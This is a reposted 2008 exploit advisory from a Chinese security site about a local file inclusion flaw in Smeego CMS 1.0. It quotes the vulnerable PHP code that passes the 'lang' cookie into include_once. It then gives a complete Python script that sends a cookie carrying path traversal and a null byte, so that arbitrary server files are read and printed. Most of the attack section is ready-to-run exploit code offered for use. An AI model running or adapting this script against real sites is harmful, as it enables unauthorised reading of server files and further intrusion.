首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Smeego 1.0 (Cookie lang) Local File Inclusion Exploit
来源:http://dark-coders.4rh.eu 作者:0in 发布时间:2008-05-19  
# Smeego CMS Local File Include Exploit
# by
# 0in from Dark-Coders Programming & Security Group
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<
#--------------------------------------------------------
# Contact: 0in(dot)email[at]gmail(dot)com
#--------------------------------------------------------
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor
#--------------------------------------------------------
# Description:
# Smeego is a Content Management System or Portal
# System written in PHP and designed to be
# easy to install and use. Smeego has a mature code
# and comes with cool modules and themes
# for you to start your own dynamic and database
# driven website. Bla bla Bla [...]
# -------------------------------------------------------
# Script home: http://smeego.com
# -------------------------------------------------------
# Vuln:
# >>>>>> File: mainfile.php <<<<<<<
#if ($display_errors == 1) { // We don't se any errors ;(
# @ini_set('display_errors', 1);
#} else {
# @ini_set('display_errors', 0);
#}
#
#if (isset($newlang)) {
#
# if (file_exists("language/lang-".$newlang.".php")) {
# setcookie("lang",$newlang,time()+31536000);
# include_once("language/lang-".$newlang.".php");
# $currentlang = $newlang;
# } else {
# setcookie("lang",$language,time()+31536000);
# include_once("language/lang-".$language.".php");
# $currentlang = $language;
# }
#} elseif (isset($lang)) {
#
# include_once("language/lang-".$lang.".php");
# $currentlang = $lang;
#} else {
# setcookie("lang",$language,time()+31536000);
# include_once("language/lang-".$language.".php");
# $currentlang = $language;
#}
# >>>>>> End <<<<<<<
# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print ' Smeego CMS Local File INclude Exploit '
print ' by '
print ' 0in from Dark-Coders Programming & Security Group! '
print ' http://dark-coders.4rh.eu '
print '====================================================='
try:
target=sys.argv[1]
path=sys.argv[2]
file=sys.argv[3]
except Exception:
print '\nUse: %s [target] [path] [file]' % sys.argv[0]
quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
lfi+="../"
print '---------------------------------------------------------'
mysock=httplib.HTTPConnection(target)
mysock=httplib.HTTPConnection(target)
mysock.putrequest("GET",path)
mysock.putheader("User-Agent","Billy Explorer v666")
mysock.putheader('Accept', 'text/html')
mysock.putheader('Accept-Language',' en-us,en;q=0.5')
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
mysock.endheaders()
reply=mysock.getresponse()
print reply.read()
time.sleep(2)
mysock.close()
print '----------------------------------------------------------'

#EOFF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FicHive 1.0 (category) Remote
·LulieBlog 1.2 Multiple Remote
·Archangel Weblog 0.90.02 (post
·Dedecms getip()的漏洞利用
·Debian OpenSSL Predictable PRN
·MeltingIce File System <= 1.0
·PHP AGTC-Membership System <=
·MyPicGallery 1.0 Arbitrary Add
·AlkalinePHP <= 0.80.00 beta (t
·Pet Grooming Management System
·MercuryBoard <= 1.1.5 (login.p
·Symantec Altiris Client Servic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved